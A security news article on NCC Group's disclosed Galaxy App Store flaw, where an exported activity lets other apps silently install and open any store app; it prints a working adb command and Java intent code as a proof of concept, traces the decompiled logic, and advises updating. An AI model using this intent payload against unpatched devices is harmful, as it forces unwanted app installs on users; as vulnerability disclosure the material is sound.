Last December, security researchers from the NCC Group discovered two vulnerabilities in Galaxy App Store which can let an attacker install any application available on the Galaxy App Store without the user’s knowledge or direct victims to malicious websites.

On January 1, 2023, Samsung released Galaxy App Store version 4.5.49.8 and publicly disclosed the issue

Today, the NCC Group published technical details for the two security issues, along with proof-of-concept (PoC) exploit code for each of them.

Forcing App Install

Security researchers found that the Galaxy App Store has an exported activity that does not handle incoming intents in a safe manner. This allows other applications installed on the same Samsung device to automatically install any application available on the Galaxy App Store without the user’s knowledge.

The following adb command can be used to abuse this issue to automatically install the application “Pokemon Go”:

am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen true

Alternatively, the following Java code can be used to perform the same action:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);

After executing the PoC, the activity com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity method onCreate(bundle) processes the incoming intent. As a part of this function, one of two methods will be executed depending on if the incoming intent contained a data property:

Buy Me A Coffee 
public class AlleyDetailActivity {
...
public void onCreate(Bundle bundle) {
    ...
    Intent intent = getIntent();
    Uri data = intent.getData();
    ...
    if (data == null) {
        a(intent);
    } else {
        e();
    }
    ...
}

The PoC did not add a data property to the new intent, so the method a(intent) gets executed, while passing the calling intent as an argument. Within a(intent), the intent and its extras are passed to class com.sec.android.app.samsungapps.detail.alleypopup.AlleyBundleContainer method parseValues(bundle, intent):

public class AlleyDetailActivity {
...
public void a(Intent intent) {
    ...
    Bundle extras = intent.getExtras();
    AlleyBundleContainer bundleContainer = getBundleContainer();
    ...
    if (extras != null) {
        this.f = bundleContainer.parseValues(extras, intent);
    }
    ...
}

The method parseValues(bundle, intent) parses the intent extras and adds them to a Content object. Some of the important values include:

  • “GUID” = the package name of the application to be installed
  • “directInstall” = if the package should be automatically installed
  • “directOpen” = if the application should be opened right after it is installed
public class AlleyBundleContainer {
...
public ContentDetailContainer parseValues(Bundle bundle, Intent intent) {
    Content content = new Content();
    String string = bundle.getString(“GUID”);
    content.setGUID(string);
    ...
    this.g = bundle.getBoolean(“directInstall”, false)
    this.h = bundle.getBoolean(“directOpen”, false)
    ...
    return content;
}

Later, since directInstall is set to true, the application will execute the method J() within the AlleyDetailActivity class. This method will then execute the method b(AlleyDetailActivity) within the class com.sec.android.app.samsungapps.detail.alleypopup.b

public class AlleyDetailActivity {
...
public void J() {
    ...
    if (this.d == Constant_todo.AppType.APP_NOT_INSTALLED || this.d == Constant_todo.AppType.APP_UPDATABLE) {
        b.b(this);
    }
}

The method b(AlleyDetailActivity) will then setup a task to download and install the target application which was previously specified by the incoming intent. After the application is installed, since “directOpen” was set to “True”, the Galaxy App Store application will open the newly installed application.

READ
What is a Keylogger? How to Detect Keyloggers on Your Computer and Mobile Phone

Recommendation

For Samsung devices running Android 12 or lower, Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.

This issue does not affect devices running Android 13. Users should still update their Galaxy App Store to the latest version to address potentially other issues.